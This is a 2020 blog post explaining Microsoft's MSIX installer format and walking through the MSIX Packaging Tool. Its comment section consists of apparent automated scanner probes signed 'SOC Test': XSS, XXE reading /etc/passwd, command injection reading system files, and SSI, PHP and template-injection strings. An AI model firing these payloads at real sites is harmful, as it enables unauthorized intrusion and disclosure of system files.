View Blog

Jan 2020
08

MSIX … What it means for you… and managing those Applications

MSIX … What it means for you… and managing those Applications

Do not be alarmed if you see a file with an .msix extension to it.  MSIX is the latest application installer for Windows applications.  Now that you know what it is, the next question is probably, why does the world need another application installer?

Good question.  After all, we already have three installer formats.


The current set of Installer Choices

The former trilogy of application installers include EXE, MSI and AppX packages.  EXE installers are the most recognized and best suited for manual installs.  They incorporate GUI driven wizards that guide users through the installation process.  This allows for customized options such as multiple languages, add-ons and selected file paths.  EXE installers can also detect previous installations.  Because they are so accommodative to customization, they are also complex.   This makes unattended installs challenging.  EXE files also make admins very nervous in a malware world. 

MSI installers are simple, which is why they are best-suited silent unattended installations.  They too use graphical interfaces but do not offer extras or customized options, nor can MSI installers detect prior installations.  Finally, there are AppX installers.  These are used for Universal Windows apps and have similar characteristics to MSI installers in that they are simple and straightforward.  One thing that sets them apart from the other two is that they rely on container technology.  This isolates them from the rest of the operating system.  This makes them much more secure.  Unfortunately, AppX packages can only be used for Windows 10 so legacy machines cannot utilize them.


The new alternative called MSIX

MSIX is the new kid in town.  It is not very popular as of yet as it was just released in 2018.  It is the alternative to the current three and Microsoft intends that the MSIX packaging solution to be the centerpiece of its deployment toolset eventually.  Like many great ideas from Microsoft, new tools and ways of doing things take time for organizations to digest them.  The MSIX installer platform does not have a great market presence as of yet.   That does not take away from its many benefits however.  MSIX has definite improvements over its predecessors as it combines the best features of MSI and APX into a single format.  Basically, it installs like an MSI file, but behind the scenes, installs like an AppX.  You can create MSIX packages with either an interactive user interface or command line sequence.  Let’s look at the advantages associated with this new installer format.


Advantages of the MSIX Installer

One thing common to traditional applications is that tend to leave a footprint.  This footprint consist of AppData files and registry entries that never seem to get deleted after the application is uninstalled.  This clutter then lives on for the lifetime of the hosted machine.  MSIX has alleviated this.  Like AppX, MSIX is based on a containerized model.  This simplifies both the install and uninstall processes.  Uninstalling an MSIX package will remove any files and registry entries created by the app within the AppData folder, reducing machined clutter.

Unlike AppX installers, MSIX installers work on more than just Windows 10 machines and they support 32-bit applications.  Microsoft has released an SDK, which provides all API’s necessary to unpack an app package on multiple platforms.  Its cross-platform compatibility includes iOS, MacOS, Android, Linux and Windows 7.  In addition, the process of converting older applications to the MSIX format is far easier than to AppX.  You can also convert AppX applications to MSIX as well.  MSIX package bundling allows a single package to contain multiple language or device specific items, except unlike EXE installs, they options can be automatically selected by Windows. 

MSIX can also hand over the updating process to the operating system.  This streamlines the updating process by making it more secure and reliable.

Security is at the epicenter of MSIX.  MSIX applications are tamper proof because they must be digitally signed regardless of how the packages are installed.  For software vendors creating MSIX packages to publish in the Microsoft Store, Microsoft will sign the package once the approval process has been is complete.  Organizations intending to publish MSIX for direct download or internal network distribution must sign it with a valid code-signing certificate purchased from a certificate authority.

 

The MSIX Packaging Tool

You can download the MSIX packaging tool from the Microsoft Store.  The package tool requires Windows 1809 and later.  Microsoft recommends that you create a clean VM for the conversion host.  Keep in mind that the MSIX Packaging Tool will assume the processor architecture of the Windows 10 OS version in which the conversion process is taking place. You must convert your installers in the same environment where you expect to deploy them.  Once installed, simply open the tool to begin the packaging wizard.  You will be first be asked to choose the selected task.  In this example, we are creating a new application package.

 

 

You will then choose the desired packaging method.

 

The packaging tool will perform an assessment of the machine that will handle the conversion process.

 

You will then set out to create the package.  You need to select the installer you want to package.  Then you must select a signing preference.  Your choices are as follows:

 

In the example below, we have selected an MSI installer with no arguments.  We are signing using a certificate from a certificate authority with the assigned password.

 

Next, fill out required packaging information.

 

Click “Next” and the installation process will begin. During this process, the packager will capture the registry or any files needed to install or configure the app.

 

At this point, the conversion process will listen for any executables that are triggered at the initial launch of the application.  This is why it is essential use a quiet machine for the conversion process.  Captured executables will be displayed on the screen.  It is here that you will manage any first launch tasks.  You should launch the application at least one time in order to capture any first launch tasks. 

 

Upon clicking “Next” you will asked to confirm that you wish to culminate the listening process.

 

Now choose a destination folder for the final package and click Create.

 

That completes the MSIX packaging process.  Be prepared to see MSIX packages a lot more down the road.  

 

Comments (40)

SOC Test

<![CDATA[<]]>script<![CDATA[>]]>alert('Breachlock XML')<![CDATA[<]]>/script<![CDATA[>]]>

SOC Test

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

SOC Test

; type %SYSTEMROOT%\win.ini

SOC Test

&& type %SYSTEMROOT%\win.ini

SOC Test

| type %SYSTEMROOT%\win.ini

SOC Test

|| type %SYSTEMROOT%\win.ini

SOC Test

%0Atype %SYSTEMROOT%\win.ini

SOC Test

<!--#echo var="DATE_LOCAL" -->

SOC Test

<

SOC Test

!

SOC Test

-

SOC Test

-

SOC Test

'

SOC Test

"

SOC Test

a

SOC Test

<?php phpinfo(); ?>

SOC Test

<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file://etc/passwd" >]> <foo>&xxe;</foo>

SOC Test

; cat /etc/passwd

SOC Test

&& cat /etc/passwd

SOC Test

| cat /etc/passwd

SOC Test

|| cat /etc/passwd

SOC Test

%0Acat%20/etc/passwd

SOC Test

'

SOC Test

"

SOC Test

#

SOC Test

;

SOC Test

)

SOC Test

${9999+12}

SOC Test

"><ScRiPt>alert('Breachlock-XSS')</sCriPt>

SOC Test

<IMG SRC=”javascript:alert('Breachlock-XSS');”>

SOC Test

"><img src=x onerror=javascript:alert('Breachlock-XSS');>

SOC Test

</script><script>alert('Breachlock-XSS')</script>

SOC Test

<h1>BREACHLOCK HTML Injection</h1>

SOC Test

breachlock'

SOC Test

test

SOC Test

test

SOC Test

test

SOC Test

test

SOC Test

test

SOC Test

test

leave us a comment

You must be logged in to MDMandGPanswers.com to make a comment.